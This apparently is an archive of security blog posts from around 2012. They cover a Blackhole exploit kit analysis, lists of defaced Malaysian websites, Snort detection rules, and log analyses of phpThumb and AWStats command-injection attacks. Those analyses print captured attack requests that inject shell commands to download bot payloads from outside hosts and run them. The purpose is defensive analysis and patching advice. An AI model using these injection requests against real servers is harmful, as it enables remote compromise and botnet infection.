Posts Tagged ‘Technology’
Yahoo! Mail Now Supports HTTPS
According to the latest update by Yahoo! Help on January 1, 2013, Yahoo finally got support for Hypertext Transfer Protocol Secure (HTTPS). But, not enabled by default. Please ensure that you enable it for your account right now!
How to Enable HTTPS for your Yahoo! Mail account?
(1) Once you sign in, click the gear icon in the upper right corner and select Mail Options.
(2) By default, you will now in the General menu. Scroll down, under Advanced Settings, check the box next to Turn on SSL.
Mail Options
Turn On SSL
According to Venkat, currently the browsers that support SSL for Yahoo Mail for Windows are:
- Internet Explorer 7.0 -10.0 and newer
- Chrome 5.0 and higher
- Firefox 3.5 and higher
- Safari 4.0 and newer
Till then, be safe on Internet!
Analysis of a Blackhole Exploit Kit
Today, I would like to share with you guys an analysis of a blackhole exploit page. (more on how to perform analysis)
Target of Analysis: http://xxx/go.php?d=3f34337dca7d6c7a
The method used by this blackhole to spread is via spammed email, where it tricks a potential victim to browse a Blackhole exploit site and thus download malicious payload into the victim’s computer.
We can try two different approaches in this analysis…
First, we can browse the landing page and at the same time capture the traffic using Wireshark, and further check on the communication between our host and the exploit site. (*not recommended, unless we are doing it in an isolated environment, or we are pretty sure we won’t be compromised. =p)
Second, since most of the Blackhole exploit kit used JavaScript, we can actually use a generic JavaScript unpacker (you can try this). Submit the landing page URL into the site and we can get both obfuscated and deobfuscated JavaScript in a few seconds. Also, from there, we can obtain the malicious payload, and further upload the payload to VirusTotal to check if it is detected by our AV vendors.
For this case, here is the result from VirusTotal: [1] and [2]
The malicious payloads are actually detected by more then 10 AV vendors. Furthermore, jsunpack can also provide us information on the key vulnerability targeted by this Blackhole exploit kit, which is an Internet Explorer (IE) vulnerability under CVE-2006-0003.
One of the advantages of capturing the traffic is we can get the traffic flow summary, which indicates what kinds of contents we have loaded when we visit the Blackhole exploit landing page. Interestingly, the result we obtained is pretty similar with the one presented in the technical paper by Sophos – Exploring the Blackhole exploit kit (see page 12, written by Fraser Howard).
Blackhole traffic flow summary
*This can be useful for our analysis. We should know what happen if we see these in the logs. (ignore GET /favicon.ico)
Another main feature of a blackhole exploit page is the use of heavily obfuscated code, which aimed to evade detection. If we are using jsunpack, then it will automatically deobfuscate the code for us. We may also try some automated tools such as Revelo by Kahu Security. However, bear in mind that automated tools are not always the best to perform deobfuscation.
In case we need to deobfuscate the script (specifically JavaScript) manually, I will recommend you this page, as the very first step in obfuscation is to first beautify your code/script.
Part of obfuscated code
Part of deobfuscated code
*Looks like it tried to check what browser is on the victim’s computers and then doing further exploitation
Also, the pcap file captured is very useful for us to see if the traffic flow between our host and the Blackhole landing page can be detected by Snort IDS.
For this specific case, thanks to Nick Randolph for informing me that Snort VRT has signature in place for detection:
alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any (msg:”SPECIFIC-THREATS Blackhole landing page with specific structure – prototype catch”; flow:to_client,established; content:”prototype”; content:”}catch(“; distance:0; pcre:”/prototype([^\x7d]{1,3})?\x7dcatch\x28/smi”; metadata:policy balanced-ips drop, policy security-ips drop, service http; reference:url,community.websense.com/blogs/securitylabs/pages/black-hole-exploit-kit.aspx; classtype:attempted-user; sid:21492; rev:12;)
Hope you enjoy this analysis!
#TorTorOPS – When Will It Stop?
Just a quick and short one… Seems like there is no sign that #TorTorOPS will stop!
Here is the latest list of websites which got defaced under #TorTorOPS:
fattymok.com.my/ defaced by YaDoY666@ServerIsDown.Org
inspin.gov.my/x.htm defaced by Cyber Galau
kliksdesign.com.my/id/ defaced by m0eslim h4x0r
kliksniaga.my/ defaced by m0eslim h4x0r
mrsb.my/v2/ defaced by m0eslim h4x0r
naztech.com.my/v3/ defaced by m0eslim h4x0r
peraga.com.my/ defaced by m0eslim h4x0r
polistrg.gov.my/v3/ defaced by m0eslim h4x0r
servertrg.my/ defaced by m0eslim h4x0r
treetopwalk.com.my/ defaced by m0eslim h4x0r
#TorTorOPS, Continue to Dance?!
After the post on #TorTorOps, I have crawled through the Internet and found out some others websites with .MY domain are defaced by our neighbour – the Indonesian hackers. I am not sure when these sites are defaced. But, based on the defacement content, all is done by Indonesian hackers, and some are in support of #TorTorOps.
1gold.com.my/?p=611 defaced by Nuxbie
advancefood.com.my defaced by Bl69
bersatu.my defaced by xrootx ft altiiever
billing.webdesign.my – unknown [in support of #TorTorOps]
esurge.net.my/nd.html defaced by Al3x 0wn5
gethosted.com.my – unknown [in support of #TorTorOps, special notes: YaDoY666@ServerIsDown]
herbsnfood.com.my/shop/images/img142.pjpeg hacked by Indonesian Coder Team
huihuanggroups.com.my – unknown [in support of #TorTorOps]
lightness.com.my defaced by Om Jin , BlackOne HaXor & AgoenkJr
sedo.com.my/indonesia.html hacked by Indonesian Coder Team
studyinmalaysia.com.my defaced by “#ALL INDONESIAN CYBER TEAM#”
Also, although Football Association of Malaysia’s (FAM) official websites have been recovered from the web defacement, the hacker managed to place a file under fam.org.my/hack.php_hack19june2012, where the site admin still have not remove it yet!
For all website administrators, I would like to share this quote with you:
“If you spend more on coffee than on IT security, you will be hacked. What’s more, you deserve to be hacked.” — Richard Clarke
FAM hacked
#TorTorOPS, Let’s Dance?!
A statement made by Malaysian Information, Communications, and Culture Minister, Dato’ Seri Utama Dr. Rais Yatim last week had rile our neighbor – Indonesian up!
News reported that Dato’ Seri Utama Dr. Rais Yatim said Tor-Tor dance and Gordang Sambilan drums would be acknowledged as national heritage and registered under Section 67 of the National Heritage Act 2005. It drove the anger of Indonesian who claimed that Tor-Tor dance is their country’s cultural heritage. To defend, Indonesian’s hackers had turned their anger into a hacking operation, which known as #TorTorOps.
A notification from Zone-H this morning showed that the official website of Malaysian Information, Communications, and Culture Ministry had been defaced by Indonesian’s hackers.
We also found out that quite a numbers of websites with .MY domains are affected. Basically these are done by few groups or individual hackers: TeguhMicro, Indonesian Coder Team, onestree, Tanpa Name, Al3x 0wn5, BlackShadow and 46400.
#TorTorOPS
Here are the websites which are defaced [which I believe is under the #TorTorOPS]:
1sttarget.com.my defaced by TeguhMicro
bell.com.my/tmp defaced by 46400
emetal.com.my defaced by onestree
happystart.edu.my defaced by Tanpa Name
jcci.com.my defaced by onestree
jobsite.my defaced by Indonesian Coder Team
pdkjitra.gov.my defaced by Al3x 0wn5
rbtravel.com.my defaced by BlackShadow
semua.my defaced by Indonesian Coder Team
server.net.my defaced by Al3x 0wn5
shafaz.com.my defaced by BlackShadow
zhineng.com.my defaced by Indonesian Coder Team
Are you hosting a .MY domain? Be aware!
Snort to Detect MySQL Authentication Bypass Exploit
A serious security bug in MySQL and MariaDB was posted by Sergei Golubchik where there is a 1 in 256 chance that ANY password would be accepted for authentication. The flaw was caused by an assumption that the memcmp() function would always return a value within the range -127 to 127.
Yesterday, Jonathan Cran, Chief Technology Officer (CTO) of Pwnie Express came out with a quick test program for the libc’s memcmp to tackle this MySQL flaw which falled under CVE-2012-2122. Upon this, HD Moore had demonstrated this exploitation using the mysql_authbypass_hashdump module released with the latest Metasploit Framework. On the same day, SecurityTracker had keep tracked with us on this latest vulnerability, where MySQL had issued a fix for version 5.1.63, 5.5.24 and 5.6.6.
Test Program by Jonathan Cran
I have tried on the latest mysql_authbypass_hashdump module, with the intention to study the traffic behavior of this exploit. As mentioned by Sergei Golubchik, if one knows a user name to connect (and “root” almost always exists), she can connect using *any* password by repeating connection attempts. Based on this, we can actually figure out what the exploit roughly look like.
To confirm, let’s have a look on part of the traffics captured by Wireshark during the exploit:
The source is trying to establish “abnormal” amount of connection to your MySQL (depend on your network) and try to login in as “root” (maybe differ). It is kind of brute force attempt, which where caused your MySQL to respond with “Response Error 1045“.
Based on this, we can further conclude that these existing two rules from Emerging Threats are good enough to detect such exploit.
alert tcp $EXTERNAL_NET any -> $HOME_NET 3306 (msg:”ET POLICY Suspicious inbound to mySQL port 3306″; flow:to_server; flags:S; threshold: type limit, count 5, seconds 60, track by_src; reference:url,doc.emergingthreats.net/2010937; classtype:bad-unknown; sid:2010937; rev:2;)
alert tcp $HOME_NET 3306 -> $EXTERNAL_NET any (msg:”ET SCAN Multiple MySQL? Login Failures, Possible Brute Force Attempt”; flow:from_server,established; content:”|15 04|”; depth:64; content:”|32 38 30 30 30|Access denied for user|20|”; fast_pattern:only; content:”using password|3A 20|”; threshold: type threshold, track by_src, count 5, seconds 120; reference:url,doc.emergingthreats.net/2010494; classtype:attempted-recon; sid:2010494; rev:3;)
My advice is, make sure these two rules are enabled in your Snort IDS. And, if you are running on MySQL, what are you waiting for? Apply patches now!
mysql_authbypass_hashdump by Metasploit
*Just before I post this, I got another blog update from VRT, where the team had come out with a signature (SQL MySQL/MariaDB client authentication bypass attempt, SID 23115) today to tackle this MySQL Authentication Bypass vulnerability.
Symantec Network Breached
Symantec Network Breached
6th January 2012
- Symantec confirmed a hacking group has gained access to some of the security product’s source code.
- The unidentified hacker, YamaTough passed a file to Infosec Island.
- The file was then handed by Infosec Island to Symantec for further investigation.
- Cris Paden, Sr. Manager for Corporate Communications at Symantec confirmed that the file contained source code for the 2006 version of Symantec’s Norton antivirus product.
Symantec update on Facebook:
“Symantec can confirm that a segment of its source code used in two of our older enterprise products has been accessed, one of which has been discontinued. The code involved is four and five years old. This does not affect Symantec’s Norton products for our consumer customers. Symantec’s own network was not breached, but rather that of a third party entity. We are still gathering information on the details and are not in a position to provide specifics on the third party involved. Presently, we have no indication that the code disclosure impacts the functionality or security of Symantec’s solutions. Furthermore, there are no indications that customer information has been impacted or exposed at this time. However, Symantec is working to develop remediation process to ensure long-term protection for our customers’ information. We will communicate that process once the steps have been finalized. Given the early stages of the investigation, we have no further details to disclose at this time but will provide updates as we confirm additional facts.”
17th January 2012
Symantec admitted that the company was hacked in 2006.
According to Reuters:
“Paden said on Tuesday that an investigation into the matter had revealed that the company’s networks had indeed been compromised. We really had to dig way back to find out that this was actually part of a source code theft. We are still investigating exactly how it was stolen. The customers of pcAnywhere, a program that facilitates remote access of PCs, may face “a slightly increased security risk” as a result of the exposure. Symantec is currently in the process of reaching out to our pcAnywhere customers to make them aware of the situation and to provide remediation steps to maintain the protection of their devices and information.”
Statement by Cris Paden, Sr. Manager for Corporate Communications at Symantec:
“The 2006 attack presented no threat to customers using the most recent versions of Symantec’s software. They are protected against any type of cyber attack that might materialize as a result of this code.”
There are some voices out there which not really agree with Cris Paden:
Laura DiDio, an analyst with ITIC (Reuters)
“Symantec’s customers should be concerned about the potential for hackers to use the stolen source code to figure out how to defeat some of the protections in Symantec’s software. What we are seeing from Symantec is ‘Let’s put the best public face on this‘. Unless Symantec wrote all new code from scratch, there are going to be elements of source code in there that are still relevant today.
Questions raised by Infosec Island
“Does this not imply that Symantec’s customers who were using the same security products were equally at risk of a serious network breach event in 2006? What about customers who used the products for which the source code was stolen in the event? Were they not at risk for the last six years?“
So, what are you waiting for? If you are using Symantec, you better get it updated now!!!
Main References: Naked Security + all links as stated above
Apple: The Big Winner of 2011
Apple The Big Winner 2011
With 2011 drawing towards an end, let’s have a look on how the world crazy for Apple through the year of 2011.
In Google Zeitgeist 2011 10 Fastest-Rising Global Queries, 3 are Apple-related:
Rank 6 – iPhone 5
People used to call it as iPhone 5, which expected to come after iPhone 4. Well, at last, Apple released only iPhone 4S, which sold more than 4 million in the first three days after it was introduced.
Rank 9 – Steve Jobs
Steve Jobs – co-founder, chairman, and chief executive officer of Apple Inc. He died at his California home around 3 p.m. on October 5, 2011, and left the world with Mac computers, iPods, iPhones, and iPads.
Rank 10 – iPad2
The second-generation tablet from Apple Inc. Some estimated between 400,000 and 500,000 iPad2 were sold over the debut weekend.
At the same time, iPhone topping the list of Yahoo Top 10 Searches and it is the only gadget in the top 10 list. The rest are news events and persons which included Casey Anthony, Jennifer Lopez, Japan Earthquake etc.
On Twitter 2011 Year in Review site, Apple dominated the Tech category under the Hot topic list with Mac app store on the top, iPad on #6, iPhone on #7 and iPod on #10.
Also, according to Twitter top tweets per seconds, there are:
7,064 tweets per second on Steve Jobs resigns on 25 August 2011
6,049 tweets per second on Steve Jobs passed away on 6 October 2011
I can’t agree more with SJVN on this:
“You can talk all you want about other technologies and gadgets, but what everyone really wants to know about is Apple products, Apple technologies, and still more Apple.”
Just wondering, can the world survive without Apple?
Main Reference and Sources of Image: All links as stated above
phpThumb() “fltr[]” Command Injection Vulnerability
Hye… Right after the AWStats vulnerability scan which last for several weeks… Here come the second old threat, which happened on the past few days. Let’s have a look on it….
Here are part of the logs which I extracted from the IDS:
URL:/components/com_hotornot2/phpthumb/phpThumb.php; :protocol:http; :field:fltr[]; :value:blur9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; ; :score:18; :pam.injection.shell.score:4; :pam.injection.shell.pedantic:true; :pam.injection.argument.token.li:8
URL:/admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php; :protocol:http; :field:fltr[]; :value:blur9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; ; :score:14; :pam.injection.shell.score:4; :pam.injection.shell.pedantic:true; :pam.injection.argument.token.li:8;
These logs above are pretty similar with this (below), which I extracted from IIS, where we can have a clearer picture on what is actually going on:
GET /components/com_hotornot2/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur9%%20-quality%%20%%2075%%20-interlace%%20line%%20fail.jpg%%20jpeg:fail.jpg%%20;%%20ls%%20-l%%20/tmp;wget%%20-O%%20/tmp/barbut6%%20bingoooo.co.uk/barbut6;chmod%%200755%%20/tmp/barbut6;/tmp/barbut6;ps%%20-aux;%%20&phpThumbDebug=9 HTTP/1.0″ 404 326
Basically, it is a phpthumb vulnerability scan which embedded with bash shell commands. The phpthumb vulnerability was first reported by Secunia in April 2010 [CVE-2010-1598] [http://secunia.com/advisories/39556/].
As reported by Secunia:
“A vulnerability has been discovered in phpThumb(), which can be exploited by malicious people to compromise a vulnerable system. Input passed via the “fltr[]” parameter to phpThumb.php is not properly sanitised before being used in a command line argument. This can be exploited to inject and execute arbitrary shell commands via specially crafted requests.“
The first part of the attack is to exploit the vulnerability in phpThum.php fltr[] parameter:
components/com_hotornot2/phpthumb/phpThumb.php?fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg
Once it passed through the input validation, it will try to inject and execute the shell commands. Based on what I observed, here are the two typical shell commands:
Shell Command (1):
ls -l /tmp
wget -O /tmp/barbut6 bingoooo.co.uk/barbut6
chmod 0755 /tmp/barbut6
/tmp/barbut6
ps -aux
Shell Command (2):
ls -l /tmp
wget -O /tmp/f 67.19.79.203/f
killall -9 perl
perl /tmp/f
Let’s see what these commands are trying to do.
Shell Command (1):
ls -l /tmp
*listing all files in tmp directory along with detailed information
wget -O /tmp/barbut6 bingoooo.co.uk/barbut6
*download file barbut6 from bingoooo.co.uk
chmod 0755 /tmp/barbut6
*determine the user privilege on barbut6 where:
755 – ugo
7 – full (read, write, execute)
5 – read and execute
u – user
g – group
o – others
/tmp/barbut6
*go to barbut6
ps -aux
*ps command which gives a snapshot of the current processes where:
-a = tells ps to list the processes of all users on the system.
-u = tells ps to provide detailed information about each process.
-x = adds to the list processes that have no controlling terminal, such as daemons, which are programs that are launched during booting (i.e., computer startup) and run unobtrusively in the background until they are activated by a particular event or condition.
Shell Command (2)
ls -l /tmp
*listing all files in tmp directory along with detailed information
wget -O /tmp/f 67.19.79.203/f
*download file f from 67.19.79.203, where I have no ideas what is “f”
killall -9 perl
*kill all processes with signal 9, which is SIGKILL, as opposed to the default SIGTERM.
SIGKILL = The signal sent to a process to cause it to terminate immediately.
SIGTERM = The signal sent to a process to request its termination.
perl /tmp/f
*execute “f”
I try to connect to both bingoooo.co.uk/barbut6 and 67.19.79.203/f. But, the connection failed.
bingoooo.co.uk/barbut6 - 404 Not Found
IP Info 67.19.79.203:
NetRange: 67.18.0.0 – 67.19.255.255
OrgName: ThePlanet.com Internet Services, Inc.
OrgId: TPCM
Address: 315 Capitol
Address: Suite205
City: Houston
StateProv: TX
PostalCode: 77002
Country: US
I have no exact answers on what the shell commands are trying to do. However, based on what I searched so far, the intention of this attack is to download bots from bingoooo.co.uk and 67.19.79.203 respectively. Besides, I also found out from some forums which mentioned that barbut6 is a process with high CPU utilization.
To ensure that we are safe from such vulnerability, please ensure phpThumb has been upgraded to the latest version available (1.7.11 or above).
Enjoy. =)
Main Reference: All links as stated above
AWStats Remote Command Execution Vulnerability
In the past few weeks, we can see that the AWStats remote command execution vulnerability is wildly exploited. At the time of this writing, I see no more scanning on this vulnerability. However, I guess it is good if I can share with you guys here on this AWStats vulnerability.
AWStats Remote Command Execution Vulnerability
AWStats is a free powerful and featureful tool that generates advanced web, streaming, ftp or mail server statistics, graphically. [http://awstats.sourceforge.net/] This vulnerability was reported by SANS Internet Storm Center, back in 2005. [http://isc.sans.edu/diary.html?date=2005-08-29]. We can also refer to [CVE-2005-0116].
From one of the sample logs extracted from Snort IDS, we found out that the source is sending a hostile HTTP request towards the target:
GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;cd%20.a;wget%20http://fbi.php5.sk/qmail.tgz;tar%20-xzvf%20qmail.tgz;cd%20qmail;./start;echo%20;echo| HTTP/1.1
Via this specially-crafted HTTP request, the attacker intends to exploit the bug resides in the awstats.pl perl script. The script does not sanitise correctly the user input for the ‘configdir’ parameter. When ‘awstats.pl’ is run as a CGI (Common Gateway Interface) script, it fails to validate specific inputs which are used in a Perl open() function call. Note here that the bug is only discovered in AWStats version 6.2 and below. By exploting this vulnerability, a remote attacker could supply AWStats malicious input, potentially allowing the execution of arbitrary code WITH THE RIGHTS of the web server.
It would be rare for the signature to yield false positive. However, ‘configdir’ could be used legitimately. For now, the most effective method to overcome such vulnerability is to upgrade to the latest version of AWStats (6.3 or later) which will fix the related bug. The latest stable version is 7.0.
The AWStats vulnerability was detected by various kinds of devices:
| Snort IDS | WEB-CGI awstats.pl configdir command execution attempt ET WEB_SPECIFIC_APPS Awstats Remote Code Execution Attempt ET WEB_SPECIFIC_APPS AWStats Totals sort parameter Remote Code Execution Attempt |
| Sourcefire IPS | WEB-CGI awstats access WEB-CGI awstats.pl configdir command execution attempt |
| Cisco ASA IPS | AWStats configdir Command Exec |
| McAfee Intrushield IPS | HTTP: AWStats Remote Code Execution Failed HTTP: AWStats Remote Code Execution May be successful |
| Juniper Intrusion Detection and Prevention | HTTP:CGI:AWSTATS |
| IBM ISS Proventia IPS | HTTP_AWStats_ConfigDir_Exec |
| ISS Network-Based IDS | HTTP_AWStats_ConfigDir_Exec HTTP_AWStats_PluginMode_Exec |
Based on my observation, the attack sources covered a wide range across the regions, which I cannot found any specific geographical distribution trend. IMHO, in this case, we cannot simply accuse the source as the attacker, as there is a possibility where the source is a victim which got infected by malware, which designed specifically to exploit this AWStats vulnerability.
We can keep track on any security-related issues on AWStats via this website: http://www.awstats.org/awstats_security_news.php
Hope it helps. =)
Main Reference: All link as stated above
